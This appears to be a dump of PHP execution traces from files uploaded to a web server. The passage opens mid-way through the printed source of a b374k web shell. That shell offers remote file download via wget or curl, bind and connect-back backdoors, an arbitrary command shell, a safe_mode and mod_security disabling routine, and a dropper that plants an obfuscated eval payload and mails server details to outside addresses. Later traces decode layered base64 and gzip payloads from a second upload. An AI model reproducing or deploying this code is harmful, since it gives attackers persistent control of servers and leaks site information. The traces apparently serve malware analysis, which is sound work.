$pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from computer</th></tr>\r\n<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n</tr>\r\n</table></form>\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from url</th></tr>\r\n<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">\r\n<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php }\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ \r\n\r\n// bind connect with c\r\nif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdc.c",$port_bind_bd_c);\r\n \texe("gcc -o bdc bdc.c");\r\n \texe("chmod 777 bdc");\r\n \t@unlink("bdc.c");\r\n \texe("./bdc ".$port." ".$passwrd." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// bind connect with perl\r\nelseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdp",$port_bind_bd_pl);\r\n\texe("chmod 777 bdp");\r\n \t$p2=which("perl");\r\n \texe($p2." bdp ".$port." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// back connect with c\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcc.c",$back_connect_c);\r\n \texe("gcc -o bcc bcc.c");\r\n \texe("chmod 777 bcc");\r\n \t@unlink("bcc.c");\r\n\texe("./bcc ".$ip." ".$port." &");\r\n\t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\n// back connect with perl\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcp",$back_connect);\r\n\texe("chmod +x bcp");\r\n\t$p2=which("perl");\r\n \texe($p2." bcp ".$ip." ".$port." &");\r\n \t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\nelseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\']))\r\n{\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\tif(is_file($namafile)) {\r\n\t\r\n\t$msg = exe($wcmd);\r\n\t}\r\n\telse $msg = "error: file not found $namafile";\r\n}\r\n\r\n?>\r\n<table class="tabnet">\r\n<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>\r\n<tr>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>\r\n<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr>\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>\r\n<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>\r\n</tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){  ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" readonly>\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo @exe($_POST[\'cmd\']);\r\n}\r\n?>\r\n</textarea>\r\n<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>\r\n</table>\r\n</form>\r\n<?php } \r\nelse { \r\nif(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){\r\n\t$file = $_GET[\'delete\'];\r\n\t@unlink($file);\r\n}\r\nelseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){\r\n\t@rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR));\r\n}\r\nelseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){\r\n\t$path = $pwd.$_GET[\'mkdir\'];\r\n\t@mkdir($path);\r\n}\r\n\t$buff = showdir($pwd,$prompt);\r\n\techo $buff;\r\n}\r\n?>\r\n<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />\r\n<?php\r\nif(isset($_POST[\'ini\']))\r\n\t{\r\n\t\t\r\n$byphp = "safe_mode = Off\r\ndisable_functions = None\r\nsafe_mode_gid = OFF\r\nopen_basedir = OFF\r\nallow_url_fopen = On";\r\n$byht = "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>";\r\nfile_put_contents("php.ini",$byphp);\r\nfile_put_contents(".htaccess",$byht);\r\necho "<script>alert(\'Disable Functions and Safemode Created\'); hideAll();</script>";\r\ndie();\r\n\t\t\r\n\t\t}\r\n\r\n?><center><br><br><div class="info">-=[ b374k r3c0ded by <b>X\'1N73CT</b> ]=-</div><br>\r\n<div class="jaya">&copy; 2013 X\'1N73CT</div></center><br><br>\r\n</script>\r\n</div>\r\n<?php\r\n\r\n$ikrhtfy = $_SERVER["DOCUMENT_ROOT"].\'/\'.\'phpinfo.php\';\r\n\r\n\r\n$fghky_ouvcbt = \'<?php phpinfo();\r\n\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){  \r\n   \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n   \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n$b = "Soldier\'ss";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("[email protected]", $b, $c);\r\nmail("[email protected]", $b, $c);\r\necho "<SCRIPT SRC=http://teledramasinhala.com/img/icons/image.js></SCRIPT>";\r\n?>\r\n</body>\r\n</html>\r\n'	/var/www/html/uploads/teeest.php(4) : eval()'d code	1	0
3		A						/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	4	$auth_pass = '9c80a1eaca699e2fc6b994721f8703bc'
3		A						/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	5	$color = '#00ff00'
3		A						/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	6	$default_action = 'FilesMan'
4	16	0	0.037192	1962256	define	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	7	2	'SELF_PATH'	'/var/www/html/uploads/teeest.php(4) : eval()\'d code(1) : eval()\'d code'
4	16	1	0.037214	1962360
4	16	R			TRUE
4	17	0	0.037230	1962288	strpos	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	8	2	'python-requests/2.25.1'	'Google'
4	17	1	0.037247	1962360
4	17	R			FALSE
4	18	0	0.037262	1962288	session_start	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	12	0
4	18	1	0.037341	1963040
4	18	R			TRUE
4	19	0	0.037356	1963040	error_reporting	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	13	1	0
4	19	1	0.037371	1963080
4	19	R			0
4	20	0	0.037385	1963040	ini_set	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	14	2	'error_log'	NULL
4	20	1	0.037403	1963112
4	20	R			''
4	21	0	0.037416	1963040	ini_set	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	15	2	'log_errors'	0
4	21	1	0.037431	1963112
4	21	R			'1'
4	22	0	0.037444	1963040	ini_set	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	16	2	'max_execution_time'	0
4	22	1	0.037461	1963144
4	22	R			'30'
4	23	0	0.037474	1963040	ini_set	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	17	2	'output_buffering'	0
4	23	1	0.037489	1963112
4	23	R			FALSE
4	24	0	0.037502	1963040	ini_set	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	18	2	'display_errors'	0
4	24	1	0.037516	1963112
4	24	R			''
4	25	0	0.037529	1963040	set_time_limit	0		/var/www/html/uploads/teeest.php(4) : eval()'d code(1) : eval()'d code	19	1	0
4	25	1	0.037544	1963104
4	25	R			FALSE
3	15	1	0.037579	1964536
2	7	1	0.037647	1188216
1	3	1	0.037655	1185720
1	26	0	0.037663	1185752	Error->__toString	0		Unknown	0	0
2	27	0	0.037676	1185832	Error->getTraceAsString	0		Unknown	0	0
2	27	1	0.037689	1186088
2	27	R			'#0 /var/www/html/uploads/teeest.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/teeest.php(4): eval()\n#2 {main}'
1	26	1	0.037709	1190224
1	26	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/teeest.php(4) : eval()\'d code(1) : eval()\'d code:20\nStack trace:\n#0 /var/www/html/uploads/teeest.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/teeest.php(4): eval()\n#2 {main}'
			0.037765	1110848
TRACE END   [2023-02-12 21:18:45.961119]

data/traces/1e7a0085735ff79f9c3991f34c3903e1_trace-1676247950.6585.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:26:16.556408]
1	0	1	0.000229	393512
1	3	0	0.001061	529552	{main}	1		/var/www/html/uploads/nasi.php	0	0
1		A						/var/www/html/uploads/nasi.php	2	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/nasi.php	3	$gzinflate = '==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
2	4	0	0.001241	529552	base64_decode	0		/var/www/html/uploads/nasi.php	4	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.001264	529840
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.001285	529808	urldecode	0		/var/www/html/uploads/nasi.php	4	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.001305	530064
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.001324	529776	htmlspecialchars_decode	0		/var/www/html/uploads/nasi.php	4	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.001342	530000
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.001373	532128	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/nasi.php	4	0
3	8	0	0.001390	532128	strrev	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
3	8	1	0.001533	667328
3	8	R			'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	0	0.001684	667296	base64_decode	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	1	0.002102	802496
3	9	R			'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	0	0.003915	667296	gzinflate	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	1	0.005688	769728
3	10	R			'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	0	0.007478	634528	gzinflate	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	1	0.009253	736960
3	11	R			'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	0	0.011000	634528	gzinflate	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	1	0.013053	736960
3	12	R			'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	0	0.014836	634528	gzuncompress	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	1	0.016774	736960
3	13	R			'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
